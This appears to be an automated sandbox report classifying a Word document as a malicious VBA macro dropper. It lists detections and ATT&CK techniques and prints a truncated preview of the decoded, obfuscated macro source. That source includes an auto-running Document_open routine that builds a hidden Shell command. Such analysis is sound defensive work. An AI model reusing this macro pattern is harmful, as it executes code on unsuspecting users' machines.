Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro and a 'Shell()' call indicate that the document is designed to execute arbitrary code upon opening. The ClamAV detection 'Doc.Dropper.Agent-6614716-0' further supports its malicious nature as a dropper. The VBA script itself is heavily obfuscated, but the presence of the Shell() call strongly suggests it attempts to download and execute a secondary payload.
Heuristics (5):
- ClamAV: Doc.Dropper.Agent-6614716-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6614716-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 116740c6f8fdd0293c358feac11b00f3f93fba03e5fbbaa44fae9d31b449fa69) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34939 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ojqiziUUtivn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EzCFZizwtwuXz()
On Error Resume Next
KpOBRh = jsQiW + 48410 / tOtZCz / qQEPY / VSYbA + WBwww + QfDumj * ZGUmP - (27108 / udTYKm / XpRUoi + CwvSv)
zOXkN = vCmkL + 1298 / JCMMNQ / LZXjmo / EqhwOT + RGJpAR + ZZDiaw * HSmXc - (98196 / arrzYT / LFmzjW + wCXNzb)
TwMqk = XuamUj + 83734 / SrbzI / URktb / KPPKd + FZXsk + itnKML * nAhkf - (72845 / SXjCN / OUmHi + IziRr)
tNnQjU = qKcvF + 7044 / VvsGwd / addWJ / WoLhta + tmVcL + iJhmq * YwJGja - (29871 / dSjJu / iqBwvB + itjaPu)
LMQXD = mGmBoJ + 98653 / IioIp / GDTVq / hurAU + ZUEkB + UFRsPD * VArkOF - (28014 / mzIsv / qzrPlh + jiCYhL)
wtqmuk = MifGiP + 91069 / CLhkdn / irpwt / ZfQjf + hZtXz + tdTTpX * jThPi - (19493 / MnKzz / qmnCOa + FOAJnh)
TDviYL = DBfINU + 41908 / iZlLms / lazwzW / YTUTt + aYtmat + olLaN * KOWjjH - (86580 / RVhZNd / cMouav + Kfzlt)
End Function
Private Function cZHUsinnwv()
On Error Resume Next
dbHOBS = 30069 - QBvcmq + (39116 - QSoBs + oREjZw / rHJWJG) * 85355 - oAOzlX - JZKWfa / vVorv
JSsSrY = 88983 - Gdkbnc + (34382 - EHKFIf + DRNfL / iRKFoi) * 66077 - itzoW - jmDnk / vkklhi
DvAzdV = 66449 - LLlWP + (79858 - aoESUU + KWYWH / mwfUVT) * 24156 - kTmCCj - RokEC / MzsdOJ
pBitjz = 46214 - ZWzzj + (7924 - NLRlLs + Oauhs / jZXFAp) * 63241 - PFFYvV - jnnur / XaQwS
End Function
Private Function PPaJEZhoPdfkY()
On Error Resume Next
FNSjF = iozWfa + 27706 / cYXnLF / hWYkT / wAcFl + FvKvW + XWImn * vfBXjB - (63192 / FjYrt / lvjnWR + RIkScB)
ckmwS = UPnDGh + 44292 / Vcawu / AfFhL / YsjdU + hQaaGu + kQudi * dCSOF - (60052 / QSMwfE / wEbjKj + AGavV)
JIFBWR = TGiawY + 43718 / DduCI / jpLTz / dwrSjz + HJHvJ + DcwzIL * wkDzA - (37036 / TcTuh / TFXOL + wOPGwi)
jvCup = SvXUG + 64569 / pqLCz / JjtJq / CBvRXU + dMGFh + hbNwld * EvjfBI - (37508 / ZnqmM / nPWiA + AEwil)
htUfR = NHjjw + 4857 / JipKY / lDzXzn / aEIctq + swYWup + BHucI * SihnV - (23618 / qBkWWr / sIwDmG + WMKTP)
SawjHf = lGUQQP + 2137 / DYPSVY / MqSkdw / wwtXh + ldEjH + SjuGN * wHBZST - (16548 / YNGQX / zlKVW + hzHZUj)
jNujio = DbRaYQ + 6740 / XTCXZ / qUPVzi / QFGAE + VTdIKK + rEWwsc * jNwZd - (5606 / tsfNl / RmWKZ + jhFtL)
End Function
Private Sub Document_open()
On Error Resume Next
NUNqo = 23497 / ObUXw / DEJQzN - CZjsj * (IOPaL - pGXSrG - (49885 - nwjuin))
zjlnih = 82636 / CDluj / vBGLv - ZEmIp * (XwHvL - NYDLA - (50559 - mtGsK))
Shell "" + UNLfBGonUHPEqz + qJXjlSJZ + CVar("c") + DsmOvUkRuN + nAjiWwK + iDboBi + KjDjziJKX + AsqWDnSY + rcWAGXPT + tRXBFtkuvrA + fMBHjqzr + HuGBBOp + MBDPuz + dLmZfRkzr + TIuioCLzPXz + XOUmSdCln + zWMoZtMnLh + zndQmPEX + cwIKuDGrXhIzjA, 0
IZSLcu = 65205 / aIifY / IAISXb - czDlT * (awwEck - HfFjRi - (31864 - klZbSY))
qRcEk = 61136 / PaIDH / bEBuj - cvZApL * (sNdKA - BqHmz - (61574 - bFqJI))
End Sub
Private Function XbLAIhpkqKvUsp()
On Error Resume Next
nmRlnS = 70239 / QFrJmz / jfjIL - NEiGs * (zWiWlu - krjvGF - (82863 - kCpfzs))
iciDw = 65137 / rciMi / zppSw - uvbUvI * (ajioto - HznSa - (68653 - oMkYnD))
oJjaU = 49963 / jfvhmG / iGPHNj - kdDUid * (sausL - qNEUJ - (20536 - APKXE))
ZiuidP = 29215 / ImuJH / NooXYG - CXsPF * (irwIF - wGAtP - (22560 - sqiffa))
TjQqfF = 21987 / jdFqw / qFApbv - VBuwCX * (VSfQAi - JKENGz - (73677 - bOTNdK))
End Function
Private Function wkPfLdXHCOXJjP()
On Error Resume Next
qamDz = (38246 + lPbrwU - 6403 * XrChE) / WAcpwt + oXOzj * 57564 - aBhOH
sWdiv = (53439 + hmNkr - 71743 * NhqpKY) / Pwlim + zQbDX * 38320 - kicPi
aMRSS = (97323 + jLtmvY - 38250 * KOAaz) / sNsOqC + VJoalb * 92361 - KWiuMH
pmKiNu = 46885 / cOJXr / olGjv - sZLTj * (rAolLb - AqoJR - (73538 - LECwU))
tRJOok = (36726 + wUwKP - 1842 * IJOrbr) / jdAGu + ravhLd * 36229 - nJzPYT
MoFjA = (84070 + NhTSh - 98925 * DcwrL) / FLJwX + ArWfnp * 63082 - fakVwd
End F
... (truncated)